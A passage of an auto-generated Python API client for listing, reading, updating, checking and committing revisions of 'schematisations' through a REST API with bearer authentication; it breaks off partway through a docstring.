'owner__name__startswith',
'owner__name__istartswith',
'owner__name__endswith',
'owner__name__regex',
'owner__unique_id',
'owner__unique_id__iexact',
'owner__unique_id__contains',
'owner__unique_id__icontains',
'owner__unique_id__in',
'owner__unique_id__startswith',
'owner__unique_id__istartswith',
'owner__unique_id__endswith',
'owner__unique_id__regex',
'tags__in',
'ordering',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'created__range' in local_var_params and local_var_params['created__range'] is not None: # noqa: E501
query_params.append(('created__range', local_var_params['created__range'])) # noqa: E501
if 'created__date' in local_var_params and local_var_params['created__date'] is not None: # noqa: E501
query_params.append(('created__date', local_var_params['created__date'])) # noqa: E501
if 'created__date__gt' in local_var_params and local_var_params['created__date__gt'] is not None: # noqa: E501
query_params.append(('created__date__gt', local_var_params['created__date__gt'])) # noqa: E501
if 'created__date__gte' in local_var_params and local_var_params['created__date__gte'] is not None: # noqa: E501
query_params.append(('created__date__gte', local_var_params['created__date__gte'])) # noqa: E501
if 'created__date__lt' in local_var_params and local_var_params['created__date__lt'] is not None: # noqa: E501
query_params.append(('created__date__lt', local_var_params['created__date__lt'])) # noqa: E501
if 'created__date__lte' in local_var_params and local_var_params['created__date__lte'] is not None: # noqa: E501
query_params.append(('created__date__lte', local_var_params['created__date__lte'])) # noqa: E501
if 'created__year' in local_var_params and local_var_params['created__year'] is not None: # noqa: E501
query_params.append(('created__year', local_var_params['created__year'])) # noqa: E501
if 'created__year__gt' in local_var_params and local_var_params['created__year__gt'] is not None: # noqa: E501
query_params.append(('created__year__gt', local_var_params['created__year__gt'])) # noqa: E501
if 'created__year__gte' in local_var_params and local_var_params['created__year__gte'] is not None: # noqa: E501
query_params.append(('created__year__gte', local_var_params['created__year__gte'])) # noqa: E501
if 'created__year__lt' in local_var_params and local_var_params['created__year__lt'] is not None: # noqa: E501
query_params.append(('created__year__lt', local_var_params['created__year__lt'])) # noqa: E501
if 'created__year__lte' in local_var_params and local_var_params['created__year__lte'] is not None: # noqa: E501
query_params.append(('created__year__lte', local_var_params['created__year__lte'])) # noqa: E501
if 'created__month' in local_var_params and local_var_params['created__month'] is not None: # noqa: E501
query_params.append(('created__month', local_var_params['created__month'])) # noqa: E501
if 'created__month__lte' in local_var_params and local_var_params['created__month__lte'] is not None: # noqa: E501
query_params.append(('created__month__lte', local_var_params['created__month__lte'])) # noqa: E501
if 'created__day' in local_var_params and local_var_params['created__day'] is not None: # noqa: E501
query_params.append(('created__day', local_var_params['created__day'])) # noqa: E501
if 'created__day__lt' in local_var_params and local_var_params['created__day__lt'] is not None: # noqa: E501
query_params.append(('created__day__lt', local_var_params['created__day__lt'])) # noqa: E501
if 'created__week' in local_var_params and local_var_params['created__week'] is not None: # noqa: E501
query_params.append(('created__week', local_var_params['created__week'])) # noqa: E501
if 'created__week_day' in local_var_params and local_var_params['created__week_day'] is not None: # noqa: E501
query_params.append(('created__week_day', local_var_params['created__week_day'])) # noqa: E501
if 'created__quarter' in local_var_params and local_var_params['created__quarter'] is not None: # noqa: E501
query_params.append(('created__quarter', local_var_params['created__quarter'])) # noqa: E501
if 'created__time' in local_var_params and local_var_params['created__time'] is not None: # noqa: E501
query_params.append(('created__time', local_var_params['created__time'])) # noqa: E501
if 'created__hour' in local_var_params and local_var_params['created__hour'] is not None: # noqa: E501
query_params.append(('created__hour', local_var_params['created__hour'])) # noqa: E501
if 'created__minute' in local_var_params and local_var_params['created__minute'] is not None: # noqa: E501
query_params.append(('created__minute', local_var_params['created__minute'])) # noqa: E501
if 'created__second' in local_var_params and local_var_params['created__second'] is not None: # noqa: E501
query_params.append(('created__second', local_var_params['created__second'])) # noqa: E501
if 'created__isnull' in local_var_params and local_var_params['created__isnull'] is not None: # noqa: E501
query_params.append(('created__isnull', local_var_params['created__isnull'])) # noqa: E501
if 'last_updated__range' in local_var_params and local_var_params['last_updated__range'] is not None: # noqa: E501
query_params.append(('last_updated__range', local_var_params['last_updated__range'])) # noqa: E501
if 'last_updated__date' in local_var_params and local_var_params['last_updated__date'] is not None: # noqa: E501
query_params.append(('last_updated__date', local_var_params['last_updated__date'])) # noqa: E501
if 'last_updated__date__gt' in local_var_params and local_var_params['last_updated__date__gt'] is not None: # noqa: E501
query_params.append(('last_updated__date__gt', local_var_params['last_updated__date__gt'])) # noqa: E501
if 'last_updated__date__gte' in local_var_params and local_var_params['last_updated__date__gte'] is not None: # noqa: E501
query_params.append(('last_updated__date__gte', local_var_params['last_updated__date__gte'])) # noqa: E501
if 'last_updated__date__lt' in local_var_params and local_var_params['last_updated__date__lt'] is not None: # noqa: E501
query_params.append(('last_updated__date__lt', local_var_params['last_updated__date__lt'])) # noqa: E501
if 'last_updated__date__lte' in local_var_params and local_var_params['last_updated__date__lte'] is not None: # noqa: E501
query_params.append(('last_updated__date__lte', local_var_params['last_updated__date__lte'])) # noqa: E501
if 'last_updated__year' in local_var_params and local_var_params['last_updated__year'] is not None: # noqa: E501
query_params.append(('last_updated__year', local_var_params['last_updated__year'])) # noqa: E501
if 'last_updated__year__gt' in local_var_params and local_var_params['last_updated__year__gt'] is not None: # noqa: E501
query_params.append(('last_updated__year__gt', local_var_params['last_updated__year__gt'])) # noqa: E501
if 'last_updated__year__gte' in local_var_params and local_var_params['last_updated__year__gte'] is not None: # noqa: E501
query_params.append(('last_updated__year__gte', local_var_params['last_updated__year__gte'])) # noqa: E501
if 'last_updated__year__lt' in local_var_params and local_var_params['last_updated__year__lt'] is not None: # noqa: E501
query_params.append(('last_updated__year__lt', local_var_params['last_updated__year__lt'])) # noqa: E501
if 'last_updated__year__lte' in local_var_params and local_var_params['last_updated__year__lte'] is not None: # noqa: E501
query_params.append(('last_updated__year__lte', local_var_params['last_updated__year__lte'])) # noqa: E501
if 'last_updated__month' in local_var_params and local_var_params['last_updated__month'] is not None: # noqa: E501
query_params.append(('last_updated__month', local_var_params['last_updated__month'])) # noqa: E501
if 'last_updated__month__lte' in local_var_params and local_var_params['last_updated__month__lte'] is not None: # noqa: E501
query_params.append(('last_updated__month__lte', local_var_params['last_updated__month__lte'])) # noqa: E501
if 'last_updated__day' in local_var_params and local_var_params['last_updated__day'] is not None: # noqa: E501
query_params.append(('last_updated__day', local_var_params['last_updated__day'])) # noqa: E501
if 'last_updated__day__lt' in local_var_params and local_var_params['last_updated__day__lt'] is not None: # noqa: E501
query_params.append(('last_updated__day__lt', local_var_params['last_updated__day__lt'])) # noqa: E501
if 'last_updated__week' in local_var_params and local_var_params['last_updated__week'] is not None: # noqa: E501
query_params.append(('last_updated__week', local_var_params['last_updated__week'])) # noqa: E501
if 'last_updated__week_day' in local_var_params and local_var_params['last_updated__week_day'] is not None: # noqa: E501
query_params.append(('last_updated__week_day', local_var_params['last_updated__week_day'])) # noqa: E501
if 'last_updated__quarter' in local_var_params and local_var_params['last_updated__quarter'] is not None: # noqa: E501
query_params.append(('last_updated__quarter', local_var_params['last_updated__quarter'])) # noqa: E501
if 'last_updated__time' in local_var_params and local_var_params['last_updated__time'] is not None: # noqa: E501
query_params.append(('last_updated__time', local_var_params['last_updated__time'])) # noqa: E501
if 'last_updated__hour' in local_var_params and local_var_params['last_updated__hour'] is not None: # noqa: E501
query_params.append(('last_updated__hour', local_var_params['last_updated__hour'])) # noqa: E501
if 'last_updated__minute' in local_var_params and local_var_params['last_updated__minute'] is not None: # noqa: E501
query_params.append(('last_updated__minute', local_var_params['last_updated__minute'])) # noqa: E501
if 'last_updated__second' in local_var_params and local_var_params['last_updated__second'] is not None: # noqa: E501
query_params.append(('last_updated__second', local_var_params['last_updated__second'])) # noqa: E501
if 'last_updated__isnull' in local_var_params and local_var_params['last_updated__isnull'] is not None: # noqa: E501
query_params.append(('last_updated__isnull', local_var_params['last_updated__isnull'])) # noqa: E501
if 'created_by__username' in local_var_params and local_var_params['created_by__username'] is not None: # noqa: E501
query_params.append(('created_by__username', local_var_params['created_by__username'])) # noqa: E501
if 'created_by__username__iexact' in local_var_params and local_var_params['created_by__username__iexact'] is not None: # noqa: E501
query_params.append(('created_by__username__iexact', local_var_params['created_by__username__iexact'])) # noqa: E501
if 'created_by__username__contains' in local_var_params and local_var_params['created_by__username__contains'] is not None: # noqa: E501
query_params.append(('created_by__username__contains', local_var_params['created_by__username__contains'])) # noqa: E501
if 'created_by__username__icontains' in local_var_params and local_var_params['created_by__username__icontains'] is not None: # noqa: E501
query_params.append(('created_by__username__icontains', local_var_params['created_by__username__icontains'])) # noqa: E501
if 'created_by__username__in' in local_var_params and local_var_params['created_by__username__in'] is not None: # noqa: E501
query_params.append(('created_by__username__in', local_var_params['created_by__username__in'])) # noqa: E501
if 'created_by__username__startswith' in local_var_params and local_var_params['created_by__username__startswith'] is not None: # noqa: E501
query_params.append(('created_by__username__startswith', local_var_params['created_by__username__startswith'])) # noqa: E501
if 'created_by__username__istartswith' in local_var_params and local_var_params['created_by__username__istartswith'] is not None: # noqa: E501
query_params.append(('created_by__username__istartswith', local_var_params['created_by__username__istartswith'])) # noqa: E501
if 'created_by__username__endswith' in local_var_params and local_var_params['created_by__username__endswith'] is not None: # noqa: E501
query_params.append(('created_by__username__endswith', local_var_params['created_by__username__endswith'])) # noqa: E501
if 'created_by__username__regex' in local_var_params and local_var_params['created_by__username__regex'] is not None: # noqa: E501
query_params.append(('created_by__username__regex', local_var_params['created_by__username__regex'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name__iexact' in local_var_params and local_var_params['name__iexact'] is not None: # noqa: E501
query_params.append(('name__iexact', local_var_params['name__iexact'])) # noqa: E501
if 'name__contains' in local_var_params and local_var_params['name__contains'] is not None: # noqa: E501
query_params.append(('name__contains', local_var_params['name__contains'])) # noqa: E501
if 'name__icontains' in local_var_params and local_var_params['name__icontains'] is not None: # noqa: E501
query_params.append(('name__icontains', local_var_params['name__icontains'])) # noqa: E501
if 'name__in' in local_var_params and local_var_params['name__in'] is not None: # noqa: E501
query_params.append(('name__in', local_var_params['name__in'])) # noqa: E501
if 'name__startswith' in local_var_params and local_var_params['name__startswith'] is not None: # noqa: E501
query_params.append(('name__startswith', local_var_params['name__startswith'])) # noqa: E501
if 'name__istartswith' in local_var_params and local_var_params['name__istartswith'] is not None: # noqa: E501
query_params.append(('name__istartswith', local_var_params['name__istartswith'])) # noqa: E501
if 'name__endswith' in local_var_params and local_var_params['name__endswith'] is not None: # noqa: E501
query_params.append(('name__endswith', local_var_params['name__endswith'])) # noqa: E501
if 'name__regex' in local_var_params and local_var_params['name__regex'] is not None: # noqa: E501
query_params.append(('name__regex', local_var_params['name__regex'])) # noqa: E501
if 'slug' in local_var_params and local_var_params['slug'] is not None: # noqa: E501
query_params.append(('slug', local_var_params['slug'])) # noqa: E501
if 'slug__iexact' in local_var_params and local_var_params['slug__iexact'] is not None: # noqa: E501
query_params.append(('slug__iexact', local_var_params['slug__iexact'])) # noqa: E501
if 'slug__contains' in local_var_params and local_var_params['slug__contains'] is not None: # noqa: E501
query_params.append(('slug__contains', local_var_params['slug__contains'])) # noqa: E501
if 'slug__icontains' in local_var_params and local_var_params['slug__icontains'] is not None: # noqa: E501
query_params.append(('slug__icontains', local_var_params['slug__icontains'])) # noqa: E501
if 'slug__in' in local_var_params and local_var_params['slug__in'] is not None: # noqa: E501
query_params.append(('slug__in', local_var_params['slug__in'])) # noqa: E501
if 'slug__startswith' in local_var_params and local_var_params['slug__startswith'] is not None: # noqa: E501
query_params.append(('slug__startswith', local_var_params['slug__startswith'])) # noqa: E501
if 'slug__istartswith' in local_var_params and local_var_params['slug__istartswith'] is not None: # noqa: E501
query_params.append(('slug__istartswith', local_var_params['slug__istartswith'])) # noqa: E501
if 'slug__endswith' in local_var_params and local_var_params['slug__endswith'] is not None: # noqa: E501
query_params.append(('slug__endswith', local_var_params['slug__endswith'])) # noqa: E501
if 'slug__regex' in local_var_params and local_var_params['slug__regex'] is not None: # noqa: E501
query_params.append(('slug__regex', local_var_params['slug__regex'])) # noqa: E501
if 'owner__name' in local_var_params and local_var_params['owner__name'] is not None: # noqa: E501
query_params.append(('owner__name', local_var_params['owner__name'])) # noqa: E501
if 'owner__name__iexact' in local_var_params and local_var_params['owner__name__iexact'] is not None: # noqa: E501
query_params.append(('owner__name__iexact', local_var_params['owner__name__iexact'])) # noqa: E501
if 'owner__name__contains' in local_var_params and local_var_params['owner__name__contains'] is not None: # noqa: E501
query_params.append(('owner__name__contains', local_var_params['owner__name__contains'])) # noqa: E501
if 'owner__name__icontains' in local_var_params and local_var_params['owner__name__icontains'] is not None: # noqa: E501
query_params.append(('owner__name__icontains', local_var_params['owner__name__icontains'])) # noqa: E501
if 'owner__name__in' in local_var_params and local_var_params['owner__name__in'] is not None: # noqa: E501
query_params.append(('owner__name__in', local_var_params['owner__name__in'])) # noqa: E501
if 'owner__name__startswith' in local_var_params and local_var_params['owner__name__startswith'] is not None: # noqa: E501
query_params.append(('owner__name__startswith', local_var_params['owner__name__startswith'])) # noqa: E501
if 'owner__name__istartswith' in local_var_params and local_var_params['owner__name__istartswith'] is not None: # noqa: E501
query_params.append(('owner__name__istartswith', local_var_params['owner__name__istartswith'])) # noqa: E501
if 'owner__name__endswith' in local_var_params and local_var_params['owner__name__endswith'] is not None: # noqa: E501
query_params.append(('owner__name__endswith', local_var_params['owner__name__endswith'])) # noqa: E501
if 'owner__name__regex' in local_var_params and local_var_params['owner__name__regex'] is not None: # noqa: E501
query_params.append(('owner__name__regex', local_var_params['owner__name__regex'])) # noqa: E501
if 'owner__unique_id' in local_var_params and local_var_params['owner__unique_id'] is not None: # noqa: E501
query_params.append(('owner__unique_id', local_var_params['owner__unique_id'])) # noqa: E501
if 'owner__unique_id__iexact' in local_var_params and local_var_params['owner__unique_id__iexact'] is not None: # noqa: E501
query_params.append(('owner__unique_id__iexact', local_var_params['owner__unique_id__iexact'])) # noqa: E501
if 'owner__unique_id__contains' in local_var_params and local_var_params['owner__unique_id__contains'] is not None: # noqa: E501
query_params.append(('owner__unique_id__contains', local_var_params['owner__unique_id__contains'])) # noqa: E501
if 'owner__unique_id__icontains' in local_var_params and local_var_params['owner__unique_id__icontains'] is not None: # noqa: E501
query_params.append(('owner__unique_id__icontains', local_var_params['owner__unique_id__icontains'])) # noqa: E501
if 'owner__unique_id__in' in local_var_params and local_var_params['owner__unique_id__in'] is not None: # noqa: E501
query_params.append(('owner__unique_id__in', local_var_params['owner__unique_id__in'])) # noqa: E501
if 'owner__unique_id__startswith' in local_var_params and local_var_params['owner__unique_id__startswith'] is not None: # noqa: E501
query_params.append(('owner__unique_id__startswith', local_var_params['owner__unique_id__startswith'])) # noqa: E501
if 'owner__unique_id__istartswith' in local_var_params and local_var_params['owner__unique_id__istartswith'] is not None: # noqa: E501
query_params.append(('owner__unique_id__istartswith', local_var_params['owner__unique_id__istartswith'])) # noqa: E501
if 'owner__unique_id__endswith' in local_var_params and local_var_params['owner__unique_id__endswith'] is not None: # noqa: E501
query_params.append(('owner__unique_id__endswith', local_var_params['owner__unique_id__endswith'])) # noqa: E501
if 'owner__unique_id__regex' in local_var_params and local_var_params['owner__unique_id__regex'] is not None: # noqa: E501
query_params.append(('owner__unique_id__regex', local_var_params['owner__unique_id__regex'])) # noqa: E501
if 'tags__in' in local_var_params and local_var_params['tags__in'] is not None: # noqa: E501
query_params.append(('tags__in', local_var_params['tags__in'])) # noqa: E501
if 'ordering' in local_var_params and local_var_params['ordering'] is not None: # noqa: E501
query_params.append(('ordering', local_var_params['ordering'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
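# Usage sketch (illustrative): the Django-style filter lookups documented
# above map directly onto keyword arguments:
#
#     page = api.schematisations_list(
#         name__icontains='test',  # case-insensitive substring match
#         limit=10,
#         offset=0,
#     )
#     # `page` is an InlineResponse200 holding one page of results.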
def schematisations_partial_update(self, id, data, **kwargs): # noqa: E501
"""schematisations_partial_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_partial_update(id, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_partial_update_with_http_info(id, data, **kwargs) # noqa: E501
def schematisations_partial_update_with_http_info(self, id, data, **kwargs): # noqa: E501
"""schematisations_partial_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_partial_update_with_http_info(id, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_partial_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_partial_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_partial_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
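# Usage sketch (illustrative): PATCH takes a Schematisation payload; the
# import location of the model class is an assumption, not verified from
# this file:
#
#     # from <package>.models import Schematisation  (assumed import)
#     updated = api.schematisations_partial_update(
#         id=123,  # hypothetical id
#         data=Schematisation(name='renamed schematisation'),
#     )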
def schematisations_read(self, id, **kwargs): # noqa: E501
"""schematisations_read # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_read(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_read_with_http_info(id, **kwargs) # noqa: E501
def schematisations_read_with_http_info(self, id, **kwargs): # noqa: E501
"""schematisations_read # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_read_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
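# Usage sketch (illustrative):
#
#     schematisation = api.schematisations_read(id=123)  # hypothetical id
#     # returns a Schematisation model on success; openapi-generator clients
#     # conventionally raise ApiException for non-2xx responses.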
def schematisations_revisions_check(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_check # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_check(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_check_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_check_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_check # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_check_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_check" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_check`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_check`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_check`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/check/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
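# Usage sketch (illustrative): starts a server-side check of a revision and
# returns a RevisionTask describing the asynchronous job; ids and payload
# below are hypothetical:
#
#     task = api.schematisations_revisions_check(
#         id=45,
#         schematisation_pk='123',
#         data=SchematisationRevision(),
#     )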
def schematisations_revisions_commit(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Commit the revision # noqa: E501
The `commit_message` can be used to describe the changes. The `force_as` parameter allows you to override the default behaviour of committing the revision under its already assigned revision number. If another user has already committed a revision with the same number, an HTTP 409 status code is returned. In that case you can either: 1) save the revision with a higher revision number using `force_as` = `new_revision`, effectively overwriting the changes from the other user, or 2) save the revision under a new schematisation using `force_as` = `new_schematisation` and specifying a `schematisation_name`. If you want to merge your changes with the changes from the other user, you need to download their revision locally and merge it yourself. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_commit(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param Commit data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_commit_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_commit_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Commit the revision # noqa: E501
The `commit_message` can be used to describe the changes. The `force_as` parameter allows you to override the default behaviour of committing the revision under its already assigned revision number. If another user has already committed a revision with the same number, an HTTP 409 status code is returned. In that case you can either: 1) save the revision with a higher revision number using `force_as` = `new_revision`, effectively overwriting the changes from the other user, or 2) save the revision under a new schematisation using `force_as` = `new_schematisation` and specifying a `schematisation_name`. If you want to merge your changes with the changes from the other user, you need to download their revision locally and merge it yourself. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
